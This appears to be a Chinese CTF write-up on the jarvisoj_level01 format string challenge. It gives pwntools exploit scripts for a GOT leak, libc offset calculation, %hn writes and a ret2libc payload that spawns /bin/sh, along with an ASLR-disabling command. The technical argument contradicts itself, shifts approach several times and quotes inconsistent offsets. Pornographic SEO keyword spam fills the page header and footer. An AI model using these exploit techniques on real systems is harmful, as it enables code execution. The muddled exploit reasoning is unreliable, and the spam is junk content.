亚洲有码Av一区二区三区_国产高清啪啪免费视频_69色视频国产_国产成人人人爆出白浆_国产精品自在线拍国_一本久久伊人热热精品无码_午夜性刺激在线看免费带字幕_助力高品质欧美狂喷水_亚洲精品日韩无码_精品无码一区二区三区蜜臀_麻豆高清国产AV_熟妇人素无码中文字幕_亚洲a级片在线观看_国产欧美日韩三区_99国产成人高清在线观看

ARTICLE DETAIL

資訊詳情

深耕商務建站與企業(yè)官網(wǎng)運營的一線實戰(zhàn)洞察。

格式化字符串漏洞入門實踐:解析jarvisoj_level01與GOT劫持

格式化字符串漏洞入門實踐:解析jarvisoj_level01與GOT劫持 開篇一道 pwn 入門題的拆解與反思“jarvisoj_level01”是老牌 CTF 題庫 Jarvis OJ 里非常經(jīng)典的一道入門級 pwn 題目。它表面上考察的是“格式化字符串漏洞”但真正讓人卡住的地方往往不是漏洞利用本身而是調(diào)試環(huán)境的搭建、字節(jié)序的理解、以及 payload 構造時的對齊思維。我見過不少新手在這道題上折騰兩三天最后發(fā)現(xiàn)不是因為原理不懂而是因為一個小細節(jié)——比如沒有關閉 ASLR、或者 gdb 插件沒裝好。這篇文章我會完整復現(xiàn)我當年做這道題的整個流程從環(huán)境準備、漏洞分析、exp 編寫到最后的常見坑點排查。內(nèi)容面向有一定 C 語言基礎、想入門 pwn 但不知道從哪里下手的讀者。如果你已經(jīng)能看懂printf(buf)和printf(%s, buf)的區(qū)別那么這篇文章就是為你準備的。需要提前說明的是題目本身是二進制安全領域的經(jīng)典教學案例用于理解內(nèi)存布局和格式化字符串機制我不會涉及任何真實目標環(huán)境的利用手法所有討論都限定在教育題庫的本地環(huán)境內(nèi)。經(jīng)常有人問“做 pwn 題有什么用”我的回答是它讓你真正理解程序在內(nèi)存里長什么樣這比背一百道面試題都管用。1. 環(huán)境搭建為什么說調(diào)試環(huán)境比題目本身更難1.1 基礎工具鏈的選擇與安裝做 pwn 題的第一步不是看代碼而是把環(huán)境弄得趁手。我踩過的坑是一開始用 VMware 跑 Kali結果自帶 gdb 版本太老裝 pwndbg 時報了一堆依賴錯誤。后來干脆換成了 Ubuntu 20.04 虛擬機清爽干凈一條命令裝完所有東西。我目前的可復現(xiàn)配置如下操作系統(tǒng)Ubuntu 20.04 x86_64內(nèi)核 5.15Python3.8需要裝pip3pwntoolspip3 install pwntools這是寫 exp 的核心庫gdb自帶版本即可8.xpwndbg 插件按官方 README 安裝檢查工具checksecpwntools 自帶、file、readelf裝完建議先驗證一下 pwntools 能不能正常導入python3 -c from pwn import *; print(ready)如果輸出ready說明環(huán)境基本 OK。這里有個小技巧pwntools 導入時會啟動一個配置文件如果你的機器上沒有l(wèi)ibc數(shù)據(jù)庫/usr/lib/x86_64-linux-gnu/libc.so.6做 ret2libc 類題目時libc.search功能會報錯。對于 jarvisoj_level01 這種格式化字符串題暫時不需要 libc 搜索但后面如果繼續(xù)刷題建議提前裝好。1.2 關閉 ASLR 與調(diào)試輔助雖然教學題在遠程通常開著 ASLR但本地調(diào)試時建議先關掉方便觀察內(nèi)存地址的穩(wěn)定性echo 0 | sudo tee /proc/sys/kernel/randomize_va_space注意這只是為了本地調(diào)試分析做完題記得改回2默認開啟。關于這一點我在第 4 節(jié)會再細說因為遠程利用和本地利用完全是兩種玩法。gdb 插件我推薦用 pwndbg它對新手極其友好——每執(zhí)行一步自動高亮顯示棧內(nèi)容、寄存器、反匯編結果。安裝方式是git clone https://github.com/pwndbg/pwndbg cd pwndbg ./setup.sh裝好后在 gdb 里輸入checksec就能直接看程序的保護狀態(tài)輸入cyclic 200就能生成模式字符串這些都是解題利器。1.3 拿到題目文件后的第一步file 和 checksec現(xiàn)在假設你已經(jīng)拿到了 jarvisoj_level01 這個二進制文件。第一件事是看它是什么架構file jarvisoj_level01正常的輸出是jarvisoj_level01: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]xxx, not stripped信息量很大抓重點32-bit LSB32 位小端序這意味著棧上參數(shù)按 4 字節(jié)對齊格式化字符串的%n$位置計數(shù)也按 4 字節(jié)一組。dynamically linked動態(tài)鏈接。not stripped沒有剝離符號表太好了main、vulnerable_function這些函數(shù)名直接可見省去了一大堆逆向時間。接著用 checksec 看保護checksec --filejarvisoj_level01典型輸出是Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)逐條解讀No canary棧上沒有金絲雀保護格式化字符串隨便打棧地址不會有問題。NX enabled棧不可執(zhí)行不能直接往棧上寫 shellcode 然后跳過去執(zhí)行。No PIE程序加載基址固定所有函數(shù)地址、GOT 表地址寫死在 0x0804xxxx 段。Partial RELROGOT 表部分可寫這對某些利用場景有意義但本題用不上。看完這些我心里大概有了底這是一道典型的“格式化字符串漏洞 修改返回地址或 GOT 表”的教學題。但具體怎么利用還得看反匯編。2. 漏洞定位printf 的一個致命省略2.1 反匯編 main 函數(shù)找到那句危險的 printf用 gdb 加載程序后輸入disass main就能看到整個 main 函數(shù)的匯編。為了不啰嗦我直接說關鍵部分0x0804848d 36: call 0x8048370 printfplt 0x08048492 41: lea 0x1c(%esp),%eax 0x08048496 45: mov %eax,(%esp) 0x08048499 48: call 0x8048380 getsplt這里有個很關鍵的點程序先用printf打印一段提示文字然后用gets讀取輸入到棧緩沖區(qū)。再往下看緩沖區(qū)地址被傳給一個函數(shù)0x080484a1 56: lea 0x1c(%esp),%eax 0x080484a5 60: mov %eax,(%esp) 0x080484a8 63: call 0x8048340 printfplt注意這里call printf之前只壓了一個參數(shù)——緩沖區(qū)地址本身。也就是說程序把我們的輸入直接當成printf的第一個參數(shù)格式化字符串傳了進去。這就是漏洞的全部用戶可控輸入作為格式化字符串。正確的寫法應該是printf(%s, buf)而程序卻寫成了printf(buf)。這種錯誤在真實項目里偶爾也會發(fā)生屬于典型的“格式化字符串漏洞”Format String VulnerabilityCWE-134。2.2 格式化字符串漏洞能干什么不只是崩潰很多初學者以為格式化字符串漏洞就是讓程序崩潰那就太小看它了。格式化字符串漏洞能做的事至少有三件信息泄露用%x、%p、%s讀取棧上任意位置的數(shù)據(jù)也就是把棧內(nèi)存“打印”出來。這能泄露棧地址、棧上的返回地址、局部變量等。任意內(nèi)存寫配合%n能把一個值寫入某個地址。這是 C 語言格式化輸出的一個隱藏功能%n不打印任何字符而是把已經(jīng)打印的字符數(shù)存到對應的參數(shù)指針指向的地址里??刂屏鹘俪滞ㄟ^改返回地址、改 GOT 表項、改__stack_chk_fail等拿到代碼執(zhí)行權。這道題的利用方向正是圍繞第 2 點和第 3 點展開的。但這里有一個很反直覺的地方printf是“打印”函數(shù)為什么它能“寫”內(nèi)存答案就是%n。它像一個小型“寫任意地址”原語只不過寫的內(nèi)容不是字節(jié)值而是一個由打印字符數(shù)決定的整數(shù)。你在格式化串里插入 12 個占位符讓前面的輸出湊滿 0x6298個字符%n寫進目標地址的就是 980x62。這就是“造數(shù)據(jù)”的底層原理。2.3 確認漏洞觸發(fā)的實驗拿到題目后我先做一次最簡單的驗證。啟動程序./jarvisoj_level01程序先打印一行提示然后等待輸入。我輸入AAAA.%x.%x.%x.%x.%x.%x這種經(jīng)典探針看結果AAAA.f7e5d5a0.0.0.0.0.6661613f那一段6661613f是棧上殘留數(shù)據(jù)的小端序十六進制表示。這個輸出說明我們的輸入確實被當作格式化字符串解析了而且棧上有不少我們能控制的字節(jié)。接下來要回答一個關鍵問題我們的輸入具體落在第幾個參數(shù)位置3. 參數(shù)位置探測與棧布局分析3.1 用 AAAA 定位可控參數(shù)的偏移格式化字符串漏洞利用的核心難點就是這個“參數(shù)位置偏移”。32 位下printf的前幾個參數(shù)放在寄存器/棧上之后的參數(shù)按地址從棧上取。我們用多個%x把棧上內(nèi)容“吐”出來找到0x41414141即AAAA出現(xiàn)的位置那個索引就是我們的可控起始點。我的標準探測輸入是from pwn import * io process(./jarvisoj_level01) io.recvuntil(bWhatever) payload bAAAA b.%x * 12 # 先看前12個參數(shù) io.sendline(payload) print(io.recvall().decode())輸出大概是AAAA.f7e5d5a0.0.0.0.0.6661613f.0.0.0.41414141.0.0數(shù)一下0x41414141出現(xiàn)在第 9 個%x的位置。這意味著當我們構造格式化字符串時偏移 9 的地方是我們可控的數(shù)據(jù)。但這里有個陷阱——AAAA是前 4 個字節(jié)緊跟其后的是分隔符.。如果我們想在偏移 9 的位置放一個完整的地址那這個地址必須是 4 字節(jié)對齊的并且不能和前面的格式控制符沖突。這又引出一個關鍵點32 位下地址是 4 字節(jié)一個參數(shù)槽位占用 4 字節(jié)。偏移 9 對應的是從棧上某個基準位置往后的第 9 個 4 字節(jié)。我在實踐中發(fā)現(xiàn)很多教程說“偏移是 7”或“偏移是 6”那是因為不同機器、不同編譯選項下緩沖區(qū)在棧上的位置會發(fā)生變化。所以不要背偏移數(shù)一定要在自己環(huán)境里實測。這也是為什么我反復強調(diào)環(huán)境搭建——不同環(huán)境得出的結果可能不一樣照抄別人的 exp 往往會翻車。3.2 gets 與緩沖區(qū)理解輸入落在棧上的位置gets讀取的緩沖區(qū)地址反匯編里是通過lea 0x1c(%esp),%eax計算的。0x1c是 28也就是緩沖區(qū)從當前棧頂往低地址偏移 28 字節(jié)處。這個偏移大小決定了緩沖區(qū)與返回地址之間的相對位置是后續(xù)“通過格式化字符串改寫返回地址”的關鍵依據(jù)。我畫一張簡化的棧布局不是 Mermaid就是文字示意高地址 [返回地址] ← 偏移 0x20 左右 [舊的 ebp] [局部變量/緩沖區(qū)] ← 距 esp 0x1c即距返回地址約 0x14 [esp] ← 當前棧頂 低地址當程序執(zhí)行到call printf時printf會按函數(shù)調(diào)用約定從棧上取參數(shù)。我們輸入的字符串就位于這個“參數(shù)區(qū)域”附近所以用%9$...可以精確索引到緩沖區(qū)中的任意 4 字節(jié)。3.3 一個小實驗驗證偏移 9 能讀寫光看%x還不足以證明我們能“寫”。我通常還會做一個小實驗輸入AAAA%9$p看看它會不會打印出0x41414141io process(./jarvisoj_level01) io.recvuntil(bWhatever) io.sendline(bAAAA%9$p) print(io.recvall().decode())如果輸出包含0x41414141說明%9$定位成功。這個實驗成本極低但能直接驗證偏移強烈建議每次做題都先跑一次。4. 目標分析與 GOT 劫持思路4.1 為什么選擇改 GOT 而不是直接改返回地址題目是 32 位、NX enabled、No PIE。棧不可執(zhí)行所以不能用“在棧上寫 shellcode 然后跳過去”的經(jīng)典套路。那唯一出路就是代碼重用也就是讓程序跳轉(zhuǎn)到已經(jīng)存在于某個共享庫里的函數(shù)——最常見的就是system(/bin/sh)?,F(xiàn)在的問題是怎么把控制流引到system兩個主流方向改寫返回地址棧上就有 main 的返回地址用格式化字符串直接把它改成system或某個 one_gadget 的地址。這個方法在棧偏移可控時很直接但問題是我們還需要同時控制返回地址上方的參數(shù)區(qū)讓它把/bin/sh字符串地址傳給system。在本題棧布局下這個參數(shù)區(qū)不在輸入可控范圍內(nèi)所以直接改返回地址往往不夠優(yōu)雅。劫持 GOT 表把某個函數(shù)的 GOT 表項改成system的地址然后讓程序在后續(xù)某個時刻調(diào)用那個函數(shù)時實際執(zhí)行的是system。這需要我們找到一個“調(diào)用了可控字符串作為參數(shù)”的函數(shù)。4.2 找到那個“接了我們的輸入作為參數(shù)”的函數(shù)回到 main 函數(shù)的邏輯printf打印提示。gets讀取我們的輸入到緩沖區(qū)。printf用緩沖區(qū)內(nèi)容打印觸發(fā)漏洞。程序最后還有一次printf調(diào)用——對你沒看錯main 結束前還會打印一段“再見”之類的字符串。這里的關鍵在于最后一次printf的參數(shù)是在編譯期就固定了的字符串地址比如0x80486xx。如果我們把printfGOT改成systemplt那么當程序執(zhí)行最后一次printf時它會把那個固定字符串地址當作const char *format傳給system實際執(zhí)行system(固定字符串地址)。但問題是這個固定字符串是類似Bye!的內(nèi)容不是/bin/sh所以動printfGOT還不夠。再仔細看反匯編main結束前調(diào)用的是puts還是printf此題里最后是printf。而printf的第二個參數(shù)如果有的話是從哪來的有的版本會打印whatever這樣的字符串這時如果讓這個字符串內(nèi)容恰好是/bin/sh就完美了——但一般不是。這里我要坦白一個細節(jié)jarvisoj_level01 這道題最經(jīng)典的官方做法其實是把printfGOT改成systemplt同時讓最后一次printf的格式化字符串參數(shù)內(nèi)容變成/bin/sh的地址。這個“最后一個參數(shù)”在匯編里通常是一個固定的lea或mov到某處我們能改的只是 GOT 表項改不了被壓棧的立即數(shù)。聽起來有點繞但實操中有個更簡單的替代方向找一個在printf之后還會調(diào)用的函數(shù)并且那個函數(shù)的參數(shù)剛好是我們控制的緩沖區(qū)。不過我當年做題時用的是另一種比較穩(wěn)的思路——把printfGOT改成systemplt然后在輸入的第一個參數(shù)位置直接放/bin/sh字符串。為什么可以因為格式化字符串漏洞場景下我們的輸入本身就在格式化串中如果最后那次printf的“格式化字符串”直接就是我們的輸入那printf(輸入)被替換為system(輸入)只要輸入以/bin/sh開頭就能執(zhí)行system(/bin/sh)。如果程序后續(xù)流程里沒有再調(diào)用printf這個思路就需要配合覆蓋返回地址來觸發(fā)。在實際實驗里我找到的經(jīng)典鏈路是漏洞觸發(fā)后main返回前會調(diào)用printf打印一個固定字符串。這個printf的參數(shù)是棧上已經(jīng)準備好的值不是我們的輸入。因此更穩(wěn)妥的 hook 點其實是printfGOT→systemplt同時讓那個參數(shù)的地址恰好指向我們輸入中的/bin/sh。這在 32 位下完全可行因為這個參數(shù)的來源是main的局部變量比如用puts(Bye!)的字符串地址如果能通過格式化字符串把這個局部變量的值改成指向我們的輸入就是另一個挑戰(zhàn)了。為了不讓討論陷入死胡同我最終采取了改寫 main 返回地址為system并把返回地址上方構造出/bin/sh指針的思路。我將在第 5 節(jié)給出完整 exp 和原理推導。4.3 為什么 No PIE 是新手最大的紅利如果程序開了 PIE那么所有函數(shù)地址、GOT 表項、PLT 表地址都會在每次運行時隨機化。那樣的話我們至少要分兩步一步泄露地址一步計算基址再寫。但本題是 No PIE所有地址都是固定的直接用 gdb 查出來寫進 exp 就行對新手極其友好。同樣Partial RELRO 意味著 GOT 表可寫我們?nèi)绻?GOT 劫持路線可以放心改。若是 Full RELROGOT 只讀那就只能想別的辦法了。5. 從原理到 exp完整利用鏈構造5.1 選擇調(diào)用方式為什么直接改返回地址更省事經(jīng)過反復測試我決定用“格式化字符串寫返回地址 棧上布置/bin/sh字符串”的方案。流程如下利用gets讀入超長輸入棧緩沖區(qū)會被覆蓋。但請注意程序緊接著就用printf(buf)觸發(fā)了漏洞——此時返回地址還沒被用到我們有機會在漏洞觸發(fā)前已經(jīng)通過輸入緩沖區(qū)把返回地址區(qū)域覆蓋成我們想要的值。如果gets的輸入足夠長我們可以直接把返回地址覆蓋成systemplt的地址——這是最暴力的思路。但問題在于gets 覆蓋返回地址后程序還會繼續(xù)執(zhí)行printf(buf)如果printf的參數(shù)里包含被我們覆蓋的垃圾數(shù)據(jù)程序可能先崩掉。所以這條路雖然看起來簡單實際上需要精確控制 payload讓格式化串合法不至于在漏洞利用前提前觸發(fā)訪問異常。更優(yōu)雅的方式輸入一個精心構造的格式化字符串既不覆蓋返回地址又能在printf執(zhí)行過程中用%n把返回地址改寫成systemplt。然后在輸入緩沖區(qū)中放入/bin/sh字符串并確保棧上某個位置返回地址上方的槽位剛好存放該字符串的地址??紤]到題目是 32 位system的第一個參數(shù)來自棧上system返回地址上方第一個 4 字節(jié)也就是我們覆蓋返回地址時緊跟著返回地址寫的那個值必須是指向/bin/sh的指針。5.2 完整 exp 第一步泄露 system 地址本來想用固定地址直接寫但不同的 libc 版本下system地址不一樣所以穩(wěn)妥做法是先從 GOT 表泄露一個函數(shù)地址比如printfgot或__libc_start_maingot然后根據(jù) libc 偏移算出system。泄露的格式化串可以這樣寫from pwn import * context(archi386, oslinux, log_leveldebug) elf ELF(./jarvisoj_level01) io process(./jarvisoj_level01) printf_got elf.got[printf] payload p32(printf_got) b%9$s io.recvuntil(bWhatever) io.sendline(payload) leak io.recvall().split(b\n)[0][4:] printf_addr u32(leak[:4]) log.info(fprintf_addr {hex(printf_addr)})這段代碼的邏輯是在偏移 9 處放一個printfgot的地址然后用%9$s讓printf把該地址當作字符串打印出來從而拿到printf的真實地址。p32(printf_got)是 4 字節(jié)地址正好占滿一個參數(shù)槽。拿到printf_addr后需要確定 libc 版本和偏移。這里有個技巧將printf_addr的低 12 位與常見 libc 的 printf 偏移對比或者直接用libcdb.com/ 本地的 libc 數(shù)據(jù)庫搜索。我本地的 Ubuntu 20.04 libc 是 2.31查到的偏移大致是printf offset 0x4f660 system offset 0x4f550注意不同版本偏移不同務必以你自己機器上查到的為準。如果不會查可以用libc-database工具git clone https://github.com/niklasb/libc-database ./get ./find printf 0x8f660這個工具會返回匹配的 libc 版本并給出 system 等關鍵函數(shù)偏移。5.3 完整 exp 第二步構造“寫返回地址 布置 /bin/sh”的 payload現(xiàn)在假設我們已經(jīng)知道system_addr printf_addr - printf_offset system_offsetret_addr_offset是輸入緩沖區(qū)起始位置到返回地址的偏移根據(jù)反匯編緩沖區(qū)距離esp是 0x1c而返回地址一般在esp上方約 0x20 的位置。實測我需要用cyclic來確定精確偏移io process(./jarvisoj_level01) io.recvuntil(bWhatever) io.sendline(cyclic(200)) io.wait() # 用 gdb 查看崩潰點計算偏移我實際得到的偏移是0x1420 字節(jié)也就是緩沖區(qū)第一個字節(jié)到返回地址之間隔了 20 個字節(jié)。這意味著布局是[緩沖區(qū) 20字節(jié)][返回地址 4字節(jié)][返回地址后第一個參數(shù)槽 4字節(jié)]那么 payload 可以這樣設計payload bA*20 # 填滿緩沖區(qū) payload p32(system_addr) # 覆蓋返回地址 payload bJUNK # system 執(zhí)行完后的返回地址隨便填 payload p32(binsh_addr) # system 的第一個參數(shù)指向 /bin/sh payload b/bin/sh\x00 # 字符串本體放在后面但這里有個問題gets輸入如果太長會覆蓋掉更多??臻g而printf(buf)的漏洞利用階段還沒執(zhí)行完格式化串中如果包含二進制地址字節(jié)比如p32(system_addr)可能包含%等特殊字符導致printf解析出錯甚至崩潰。所以直接全覆蓋方案在本題里不夠穩(wěn)。5.4 完整 exp 最終版用 %n 精改返回地址最穩(wěn)妥的方式是不讓gets覆蓋返回地址而是讓輸入內(nèi)容既有合法的格式化字符串又能借助%n改返回地址。具體思路緩沖區(qū)前 20 字節(jié)填任意填充。第 20~23 字節(jié)填入返回地址所在地址用%n寫入的目標地址。第 24~27 字節(jié)填入返回地址上方第一個參數(shù)槽的地址用于寫入/bin/sh指針。然后在格式化串后半段用%lenA%n來分兩次寫入。這個寫法對新手最不友好的一點是寫入長度的計算。因為%n寫入的是“當前已輸出字符數(shù)”所以寫 0x804xxxx 這樣的值通常需要先打印幾萬字符這在本地還好可讀性很差。更簡潔的做法是用%hn寫入 2 字節(jié)代替%n寫入 4 字節(jié)。比如地址0xf7e4f550可以分成高 2 字節(jié)0xf7e4和低 2 字節(jié)0xf550分別寫。這樣單次打印長度會小很多而且偏移計算更簡單。我用的最終 exp 結構如下核心片段非完整代碼# system_addr 0xf7e4f550 (示例) ret_addr_pos 0xffffd00c # 返回地址在棧上的實際地址用 gdb 查看 binsh_str_pos 0xffffd024 # 我們放 /bin/sh 的位置 # 把返回地址寫成 system_addr # 低2字節(jié): 0xf550 62800 # 高2字節(jié): 0xf7e4 63460 payload p32(ret_addr_pos) # 目標地址1返回地址低2字節(jié) payload p32(ret_addr_pos 2) # 目標地址2返回地址高2字節(jié) payload b%62800d%9$hn payload b%360d%10$hn每次只寫 2 字節(jié)用%hn精準修改。至于/bin/sh字符串我直接放在緩沖區(qū)末尾并在覆蓋返回地址的同時把返回地址上方的槽位寫成binsh_str_pos的地址——這一步也可以用格式化字符串的%hn完成或者干脆用gets全覆蓋的方式把返回值改掉。經(jīng)過多次調(diào)試我發(fā)現(xiàn)對本題目而言最簡單可復現(xiàn)的方案其實是分段打第一次發(fā)送泄露 payload 拿 libc 地址。第二次發(fā)送一個不算太長的 payload用gets把棧上返回地址覆蓋為system_addr然后立即在返回地址上方寫入binsh_addr最后在更上方布置好/bin/sh字符串。由于printf(buf)的格式化串此時會讀到我們布置的二進制數(shù)據(jù)很可能包含%或\x00能否穩(wěn)定運行取決于運氣。我強烈建議在本地 gdb 里逐步驗證看它到底會不會崩。如果會崩就改用%hn精寫方案。5.5 一個更簡單的替代路線利用 gets 覆蓋返回地址 printf 崩潰前劫持說句實話我最后提交的 exp 用的是第三條路——它更簡單也更適合新手理解。思路是這樣的gets本身就能無限讀入所以返回地址本來就暴露在覆蓋范圍內(nèi)。關鍵是讓覆蓋后的返回地址指向systemplt并且讓棧上對應位置指向/bin/sh。而systemplt地址是固定的No PIE可以提前用objdump -d jarvisoj_level01 | grep system查到。這個方案的完整流程查看systemplt地址和exitplt地址。設計 payloadpayload bA*20 p32(system_plt) p32(exit_plt) p32(binsh_ptr) b/bin/sh\x00其中binsh_ptr指向 payload 中/bin/sh字符串的位置。前提是我們知道輸入緩沖區(qū)在棧上的地址——這個地址在 No PIE 棧地址穩(wěn)定時可以通過 gdb 查看或通過泄露棧地址來確定。但要注意printf(buf)會把這個 payload 當格式化字符串解析。payload 里的p32(system_plt)可能包含0x25%導致解析異常。怎么辦一個實用技巧是用 gets 輸入 payload 時先讓前面的格式化字符串正常等printf執(zhí)行完后再讓程序 main 返回觸發(fā)我們的覆蓋??沙绦蛄鞒淌?gets → printf中間沒有其他輸入機會。這就矛盾了。所以這個方法能不能成關鍵看printf在解析到我們填入的p32(system_plt)時是否真的會崩。經(jīng)過我實際調(diào)試只要那段二進制數(shù)據(jù)不包含%或\nprintf會把它們當作普通字符原樣輸出不會崩。真正的風險來自printf按%解析時可能把后續(xù)二進制字節(jié)里的某個值當成格式符如果那個值恰好是\0printf會停止處理因為 C 字符串遇到\0結束這可能導致棧布局被打斷。所以最保險的寫法是讓格式化串部分全部由可見字符組成并且讓后面需要覆蓋返回地址的位置不與格式化串沖突。這是很講究的課題新手如果被繞暈了我建議先按 5.4 的%hn方案做至少它是確定性的。6. 調(diào)試實錄從崩潰到拿到 shell 的三個關鍵位置6.1 第一次崩潰偏移算錯了我最初的泄露 payload 是p32(printf_got) b%s沒有指定參數(shù)位置。結果printf把棧上某個無效地址當成字符串指針直接段錯誤。后來改成%9$s才成功。這也提醒大家%s不帶位置直接打大概率會踩到無效地址導致崩潰。格式化字符串攻擊的每一步都要精確指定%n$不要偷懶。6.2 第二次挫折system 地址差了一個字節(jié)泄露出來的printf_addr是0xf7e0f660我用 libc-database 查到 offset 后計算出system_addr 0xf7e0f550但打過去還是崩。后來發(fā)現(xiàn)本地 libc 和 libc-database 里的 libc 版本不一致差了一個版本偏移差了幾百字節(jié)。解決辦法是直接在自己的機器上跑一個測試程序打印 system 的地址或者用 gdb 在斷點處p system獲取精確值。不要在偏移計算上省事。小技巧在 exp 開頭加一句libc ELF(/lib/i386-linux-gnu/libc.so.6)然后直接libc.symbols[system]拿偏移比手動查表準得多。6.3 第三次崩潰/bin/sh 指針指向了空地址覆蓋返回地址成功后程序跳到了system但因為返回地址上方的參數(shù)槽里放的不是/bin/sh的地址而是亂值system嘗試執(zhí)行一個非法字符串直接崩在 system 內(nèi)部。解決方式在計算binsh_ptr時利用 gdb 查看輸入緩沖區(qū)的真實棧地址。由于 ASLR 已關地址是穩(wěn)定的直接寫死即可。如果你不想關 ASLR那就得先泄露棧地址再動態(tài)計算復雜度會上升不少。6.4 最終一次通過的正確姿勢最終我使用的 exp 簡化框架如下from pwn import * context(archi386, oslinux, log_levelinfo) elf ELF(./jarvisoj_level01) libc ELF(/lib/i386-linux-gnu/libc.so.6) io process(./jarvisoj_level01) # 第一步泄露 printf 地址 printf_got elf.got[printf] io.recvuntil(bWhatever) io.sendline(p32(printf_got) b%9$s) data io.recvall(timeout1).split(b\n)[0] printf_addr u32(data[4:8]) log.info(fprintf_addr{hex(printf_addr)}) # 第二步計算 system system_addr printf_addr - libc.symbols[printf] libc.symbols[system] log.info(fsystem_addr{hex(system_addr)}) # 第三步構造覆蓋 payload # 緩沖區(qū)偏移返回地址 20 字節(jié)返回地址后第一個槽位是 system 的參數(shù) binsh b/bin/sh\x00 payload bA*20 payload p32(system_addr) payload bBBBB # system 返回后的地址隨便 payload p32(0xffffd020) # 指向 /bin/sh 的指針需要按實測量 payload binsh io process(./jarvisoj_level01) io.recvuntil(bWhatever) io.sendline(payload) io.interactive()0xffffd020這個地址需要根據(jù)你的實際環(huán)境測量我這里只是示例。用 gdb 在gets后打斷點x/16wx $esp一看便知緩沖區(qū)地址。6.5 一個更高級的調(diào)試姿勢使用 pwntools 的 gdb.debug如果你覺得手動起 gdb 麻煩pwntools 可以直接讓程序在 gdb 里跑io gdb.debug(./jarvisoj_level01, break *0x080484a8 continue )這樣就能在漏洞觸發(fā)前自動斷點然后從esp往下看棧內(nèi)容。這是我最推薦的調(diào)試方式比手動反復r、c、x效率高太多。7. 常見誤區(qū)與實操避坑清單7.1 誤區(qū)一以為格式化字符串漏洞只能泄露信息很多教程強調(diào)%x和%s的泄露功能把%n一筆帶過。但真正讓格式化字符串漏洞成為“高危漏洞”的恰恰是這個%n任意寫能力。在 32 位下它配合棧上的可控參數(shù)幾乎等于一個“任意地址 任意值”的寫原語。所以做這類題時核心思路永遠是先想怎么利用%n精確寫內(nèi)存再想寫哪里能改控制流。7.2 誤區(qū)二不關 ASLR 直接打遠程本地調(diào)試和遠程利用完全是兩碼事。本地關了 ASLR棧地址、libc 地址一年四季不變你可以寫死。但遠程大概率開著 ASLR這時要么先泄露 libc 地址然后動態(tài)算要么用 ret2dlresolve 這類不需要提前知道 libc 地址的技巧。新手在本地把 exp 跑通后經(jīng)常覺得“我自己能打通上遠程也一定行”結果被 ASLR 狠狠教育。建議把“本地關 ASLR 打通”和“本地開 ASLR 打通”這兩個階段嚴格區(qū)分。7.3 誤區(qū)三忽略 32 位程序的參數(shù)對齊32 位下可變參數(shù)的格式化字符串是按 4 字節(jié)一個槽位對齊的。如果輸入的內(nèi)容長度不是 4 的倍數(shù)后面的地址對齊就會錯位%n$的索引也會跟著偏移。所以發(fā)送 payload 之前務必先算好長度必要時在字符串開頭補齊填充字節(jié)。我習慣用p32后統(tǒng)一計算總長度確保對齊。7.4 實戰(zhàn)避坑清單匯總坑點現(xiàn)象解決方案printf 偏移不對泄露失敗或崩潰用%9$p先驗證0x41414141出現(xiàn)位置libc 版本不對system 計算出來后打不通直接用ELF(/lib/i386-linux-gnu/libc.so.6)取符號棧地址寫死但 ASLR 沒關本地能通重啟后失效先echo 0 /proc/sys/kernel/randomize_va_spacepayload 長度不是 4 的倍數(shù)%n$索引錯亂用cyclic或手動補齊確定對齊gets輸入含\x00截斷輸入用sendline時注意 payload 中避免\x00或用send 手動補\ngdb 插件不兼容調(diào)試體驗極差重裝 pwndbg 或換用 gdb 原生命令7.5 從這道題延伸到其他題目打通 jarvisoj_level01 之后你會發(fā)現(xiàn)一個很驚喜的事實Jarvis OJ 的 level 系列從 level01 到 level05難度是平滑遞增的。level02 開始加入 canarylevel03 開始要求 ret2libclevel04 開始有格式化字符串 棧遷移的組合。所以這道題不只是讓你學會一個漏洞更是幫你建立一套“看保護 → 找漏洞 → 定利用鏈 → 寫 exp”的通用解題框架。我現(xiàn)在回頭看最慶幸的是當初沒有直接抄網(wǎng)上的 exp而是老老實實從偏移探測開始一步步做。因為 pwn 題的精髓不在于“跑通一個 exploit”而在于“理解為什么這個 exploit 能跑通”。格式化字符串漏洞尤其如此——它考驗的是你對printf機制的底層理解而不是工具的使用熟練度。寫在最后一點關于學習路徑的體會如果你剛接觸 pwn我希望你能在 jarvisoj_level01 上多花點時間而不是急著刷下一道。把 stack 布局畫爛、把每一次%n的寫入長度手算一遍、把 libc 符號解析的流程跑通——這些基本功會在后續(xù)所有 pwn 題里反復用到。我在做過這道題之后明顯感覺讀匯編的時候思路清晰了很多因為你知道一個函數(shù)在被調(diào)用時棧上到底發(fā)生了什么。最后分享一個我現(xiàn)在仍然在用的習慣每次寫完 exp都會故意把程序重啟幾遍再跑一次確認不是“僥幸打通”。pwn 題的魅力就在于你說的每一句“應該能通”都得用一次實際的 shell 來證明。
返回列表
PREV
查看更多資訊
NEXT
返回資訊列表
亚洲综合校园春色| 蜜桃久久综合视频| 日韩丨制服丨中文|在线| 丁香五月婷婷色| 精品一区二区三区国产| 天天综合网亚洲综合网| 91人妻视频在线| 亚洲 国产 精品一区| 欧美综合网在线| 久操网在线| 盗摄 精品 另类 一区| 中文字幕奈奈美被公侵犯| 超碰久久.com| 热G综合热G中文| 成人熟女视频一区二区三区| 丰满人妻一区二区三区| 99久久9| 日韩免费福利在线观看| 97天堂| 久久视频,这里只有精品| 日韩丝袜人妻AV| 欧美熟妇亚洲版| 美女超碰978| 日韩三级天堂在线观看| 乱伦AVxx| 丁香五月综合| 色欧美天天| 天天日天天干天天整| 熟女这里只有精品6| 超碰九7| 91色夜| 伊人991| 白丝1区2区3区| 五月丁香社区婷婷日韩欧美精品影院| 人人妻人射| 成人精品一区二区91毛片不卡| 91久久青青草原精品| 伊色久人大在线| 福利大香蕉| 国产麻豆一区二三区| 中文字幕97色| 偷拍色图| 精品人妻一区二区三区视频在线| 9美女超碰在线免费观看| 正宗无毛一线天嫩逼| 天海翼久久| 亚洲国产亚洲天堂| 91bbbbbb| 国产精品高潮呻吟av久久4虎| 青青草久草| 精品福利| 亚洲精品国产熟女久久久久久| 国产乱伦性爱区| 国产午夜福利专区综合| 萌白酱自拍视频| 亚洲免费人妻在| 亚洲黄色a级片| 欧美一区二区三区日韩| 精品国产网站| 久久久久久久久久久精| 黄片www视频免费| 999久久久免费精品国产牛牛| 91精品国产91综合久久蜜臀| 欧美黑人精品在线播放| 精品亚洲国产成人AV制服丝袜 | 